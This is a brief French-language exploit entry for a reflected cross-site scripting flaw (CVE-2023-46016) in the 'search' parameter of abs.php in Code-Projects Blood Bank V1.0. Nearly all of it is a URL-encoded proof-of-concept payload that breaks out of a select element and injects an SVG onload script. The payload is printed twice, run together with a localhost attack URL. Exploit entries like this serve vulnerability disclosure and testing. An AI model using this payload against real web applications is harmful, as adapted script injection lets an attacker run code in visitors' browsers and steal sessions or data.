
Exploit XSS réfléchi pour Code-Projects Blood Bank V1.0 via le paramètre 'search' dans abs.php, avec un payload PoC et la documentation CVE-2023-46016.
%22%3E%3C/option%3E%20%3C/select%3E%3Cbr%3E%3Csvg/onload=alert(document.domain)%3Ehttp://localhost/bloodbank/abs.php?search=%22%3E%3C/option%3E%20%3C/select%3E%3Cbr%3E%3Csvg/onload=alert(document.domain)%3E